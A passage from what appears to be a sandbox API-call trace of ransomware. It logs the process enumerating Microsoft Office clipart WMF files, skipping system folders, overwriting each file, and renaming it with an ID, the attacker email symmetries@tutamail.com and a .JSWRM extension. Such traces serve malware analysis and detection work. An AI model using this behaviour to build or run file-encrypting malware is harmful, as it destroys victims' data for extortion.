12 [0098.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02793_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02793_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.130] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0098.130] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0098.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02793_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02793_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02793_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.130] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0098.130] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0098.130] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0098.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.130] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0098.130] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02793_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02793_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.131] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=23408) returned 1 [0098.131] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5b70) returned 0x24d210 [0098.132] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5b70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x5b70, lpOverlapped=0x0) returned 1 [0098.145] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.145] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5b70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x5b70, lpOverlapped=0x0) returned 1 [0098.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0098.145] CloseHandle (hObject=0x314) returned 1 [0098.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0098.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0098.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0098.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0098.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0098.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0098.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0098.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0098.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0098.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0098.146] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02793_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02793_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02793_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02793_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.147] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0098.147] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0098.147] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0098.147] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103d2836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103d2836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103f89f0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4b7a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO02794_.WMF", cAlternateFileName="")) returned 1 [0098.147] lstrcmpiW (lpString1="SO02794_.WMF", lpString2=".") returned 1 [0098.147] lstrcmpiW (lpString1="SO02794_.WMF", lpString2="..") returned 1 [0098.147] lstrcmpiW (lpString1="SO02794_.WMF", lpString2="...") returned 1 [0098.147] lstrcmpiW (lpString1="SO02794_.WMF", lpString2="windows") returned -1 [0098.147] lstrcmpiW (lpString1="SO02794_.WMF", lpString2="recovery") returned 1 [0098.147] lstrcmpiW (lpString1="SO02794_.WMF", lpString2="perflogs") returned 1 [0098.147] lstrcmpiW (lpString1="SO02794_.WMF", lpString2="documents and settings") returned 1 [0098.147] lstrcmpiW (lpString1="SO02794_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.147] lstrcmpiW (lpString1="SO02794_.WMF", lpString2="system volume information") returned -1 [0098.147] lstrcmpiW (lpString1="SO02794_.WMF", lpString2="msocache") returned 1 [0098.147] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0098.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02794_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02794_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02794_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.147] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0098.147] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0098.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02794_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02794_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02794_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.147] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0098.147] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0098.147] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0098.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.148] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0098.148] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02794_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02794_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.148] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=19322) returned 1 [0098.148] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4b70) returned 0x24d210 [0098.148] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4b70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4b70, lpOverlapped=0x0) returned 1 [0098.151] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.151] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4b70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4b70, lpOverlapped=0x0) returned 1 [0098.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0098.151] CloseHandle (hObject=0x314) returned 1 [0098.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0098.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0098.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0098.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0098.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0098.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0098.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0098.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0098.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0098.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0098.152] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02794_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02794_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02794_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02794_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0098.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0098.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0098.153] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103f89f0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103f89f0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103f89f0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1262e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO02862_.WMF", cAlternateFileName="")) returned 1 [0098.153] lstrcmpiW (lpString1="SO02862_.WMF", lpString2=".") returned 1 [0098.153] lstrcmpiW (lpString1="SO02862_.WMF", lpString2="..") returned 1 [0098.153] lstrcmpiW (lpString1="SO02862_.WMF", lpString2="...") returned 1 [0098.153] lstrcmpiW (lpString1="SO02862_.WMF", lpString2="windows") returned -1 [0098.153] lstrcmpiW (lpString1="SO02862_.WMF", lpString2="recovery") returned 1 [0098.153] lstrcmpiW (lpString1="SO02862_.WMF", lpString2="perflogs") returned 1 [0098.153] lstrcmpiW (lpString1="SO02862_.WMF", lpString2="documents and settings") returned 1 [0098.153] lstrcmpiW (lpString1="SO02862_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.153] lstrcmpiW (lpString1="SO02862_.WMF", lpString2="system volume information") returned -1 [0098.153] lstrcmpiW (lpString1="SO02862_.WMF", lpString2="msocache") returned 1 [0098.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0098.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02862_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02862_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02862_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0098.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0098.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02862_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02862_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02862_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0098.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0098.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0098.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0098.154] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02862_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02862_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.154] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=75310) returned 1 [0098.154] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x12620) returned 0x24d210 [0098.154] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x12620, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x12620, lpOverlapped=0x0) returned 1 [0098.161] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.161] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x12620, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x12620, lpOverlapped=0x0) returned 1 [0098.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0098.162] CloseHandle (hObject=0x314) returned 1 [0098.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0098.162] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0098.162] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0098.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0098.162] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0098.162] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0098.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0098.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0098.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0098.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0098.162] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02862_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02862_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02862_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02862_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.163] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0098.163] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0098.163] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0098.163] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103f89f0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103f89f0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103f89f0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x967a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO02886_.WMF", cAlternateFileName="")) returned 1 [0098.163] lstrcmpiW (lpString1="SO02886_.WMF", lpString2=".") returned 1 [0098.163] lstrcmpiW (lpString1="SO02886_.WMF", lpString2="..") returned 1 [0098.163] lstrcmpiW (lpString1="SO02886_.WMF", lpString2="...") returned 1 [0098.163] lstrcmpiW (lpString1="SO02886_.WMF", lpString2="windows") returned -1 [0098.164] lstrcmpiW (lpString1="SO02886_.WMF", lpString2="recovery") returned 1 [0098.164] lstrcmpiW (lpString1="SO02886_.WMF", lpString2="perflogs") returned 1 [0098.164] lstrcmpiW (lpString1="SO02886_.WMF", lpString2="documents and settings") returned 1 [0098.164] lstrcmpiW (lpString1="SO02886_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.164] lstrcmpiW (lpString1="SO02886_.WMF", lpString2="system volume information") returned -1 [0098.164] lstrcmpiW (lpString1="SO02886_.WMF", lpString2="msocache") returned 1 [0098.164] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0098.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02886_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02886_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02886_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.164] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0098.164] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0098.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02886_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02886_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02886_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.164] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0098.164] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0098.164] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0098.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.164] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0098.164] CreateFileW (lpFileName="C:\\Program Files\\Microsoft 